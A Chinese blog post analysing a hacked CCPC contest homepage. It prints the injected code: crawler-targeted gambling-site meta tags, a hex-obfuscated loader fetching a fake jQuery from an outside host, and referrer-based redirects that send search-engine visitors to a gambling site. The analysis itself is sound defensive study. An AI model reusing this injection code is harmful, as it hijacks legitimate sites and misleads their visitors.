CCPC被日调查

今天在群里看到说CCPC主页被日了，赶紧过来吃一波瓜，顺便看看是怎么实现的

简单测试之后发现，从搜索引擎过来就会跳转，而直接域名访问则不会，看一下主页的内容，发现了奇怪的代码
改的是HTML的header部分，顺便试了试登录注册什么的各种功能都没反应了，感觉是被打穿了把后台都改坏了？

代码

被日的部分估计就这段
菠菜站相关内容都给我用中文替换了，不给菠菜站引流哈。。。。

title keywords description都是百度搜索引擎抓取时的关键字，解码一下就是菠菜站简介，并且还注意到了如果不是百度抓取的话title就不是菠菜站，而是正常的CCPC名字
（现在爬虫都能执行js了吗，都开始模仿浏览器行为了？）

<title>某菠菜站名</title>
<meta name="keywords" content="菠菜站关键字。。。。"/>
<script>if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1){document.title ="首页 - 中国大学生程序设计竞赛"}</script>
<meta name="description" content="菠菜站简介"/>  
<script>var QDfSn1=QDfSn1||[];(function(){var BXcvs__L2=window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']("\x73\x63\x72\x69\x70\x74");BXcvs__L2['\x73\x72\x63']="\x2f\x2f\x62\x79\x33\x33\x35\x38\x39\x2e\x63\x6f\x6d\x2f\x6a\x71\x75\x65\x72\x79\x2e\x31\x2e\x33\x2e\x31\x2e\x6a\x73";var zqbrN3=window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]['\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x73\x42\x79\x54\x61\x67\x4e\x61\x6d\x65']("\x73\x63\x72\x69\x70\x74")[0];zqbrN3['\x70\x61\x72\x65\x6e\x74\x4e\x6f\x64\x65']['\x69\x6e\x73\x65\x72\x74\x42\x65\x66\x6f\x72\x65'](BXcvs__L2,zqbrN3)})();</script>

辣鸡混淆，就单纯的编了个码，直接在console里跑一下就能快速解码

var QDfSn1=QDfSn1||[];
(function(){
    var BXcvs__L2=window["document"]['createElement']("script");
    BXcvs__L2['scr']="//菠菜跳板.com/jquery.1.3.1.js";
    var zqbrN3=window["document"]['getElementsByTagName']("script")[0];
    zqbrN3["parentNode"]["insertBefore"](BXcvs__L2,zqbrN3)
})();

往当前页面里添加一个菠菜魔改jQuery，打开看一看

GID89a="";

//var OPAlt1=new window["\x44\x61\x74\x65"]();var SZ2=OPAlt1['\x67\x65\x74\x53\x65\x63\x6f\x6e\x64\x73']();if(SZ2%5==0){window['\x6c\x6f\x63\x61\x74\x69\x6f\x6e']['\x68\x72\x65\x66']='\x2f\x2f\x62\x6f\x62\x38\x38\x38\x38\x2e\x63\x6e\x2f'};

var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "https://hm.baidu.com/hm.js?7b3656fe95ec73529221927b52290bee";
  var s = document.getElementsByTagName("script")[0]; 
  s.parentNode.insertBefore(hm, s);
})();

var ref=document.referrer;
var baidu=ref.indexOf("baidu");
var soso=ref.indexOf("soso");
var google=ref.indexOf("google");
var sogou=ref.indexOf("sogou");
var sm=ref.indexOf("sm.cn");
var so=ref.indexOf("so.com");
var sbing=ref.indexOf("bing.cn");
if(baidu!=-1 || soso!=-1 || google!=-1 || sogou!=-1 || sm!=-1 || so!=-1 || sbing!=-1){

 this_url = 'http://菠菜站.cn/m.php';
  window.top.location.replace(this_url);
  window.location.href=this_url;
} 
  
(function () {
     
     var bp = document.createElement('script');
     bp.src = '//push.zhanzhang.baidu.com/push.js';
     var s = document.getElementsByTagName("script")[0];
     s.parentNode.insertBefore(bp, s);
      
     var src = document.location.protocol + '//js.passport.qihucdn.com/11.0.1.js?8113138f123429f4e46184e7146e43d9';
     document.write('<script src="' + src + '" id="sozz"><\/script>');
     })();

开局一个GID98a，我怀疑是GIF98a打错了。。。还带waf绕过的？菠菜牛逼嗷
先一个自调用函数向https://hm.baidu.com 这个百度的访问统计网站发了一个请求，等于说还统计有多少人被日下来的CCPC导向到菠菜站
然后检查了一下referrer，如果是来自这几个搜索引擎就给你跳过去，所以直接访问ccpc是不会被转到菠菜的
后面还有一个自调用函数，是让百度的搜索引擎进行一波收录，等于说这个网站被访问一次就进行一次提交，太脏了

学到的奇怪东西

魔改jQuery中最后那个qihucdn（也是SEO优化类似的接口）没写成功，因为这个魔改jQuery已经是异步加载进来的了，因此此时主文档的渲染就已经结束了，不能再对主文档的Document进行操作，但是insertBefore还能用，有点高级
随便找的一个解释
https://blog.csdn.net/qq_26291823/article/details/75090069

抓包的时候并没有发现向这两个网站发送请求。。还以为是他哪里写歪了，研究了两分钟发现，是burp设置中某一项设置，不抓这几个文件扩展名(^gif$|^jpg$|^png$|^css$|^js$|^ico$)，所以.js的请求发是发出去了，就是没抓到
实际上是请求了百度的hm和push两个js文件的

还有一点，因为点开就跳转时间太短，又不会在浏览器里面下断点调js，一开始都不知道到底是他的js写歪了还是我抓包的问题，后来老国王提出burp抓包然后把跳转的包拦住慢慢看就行了。。。我太蠢了，再后来发现直接访问域名不就不跳转了吗。。。并且代码也不会变

后记

所以说搞这个不是比复习有意思多了，呜呜，为什么我要学信息论和通信原理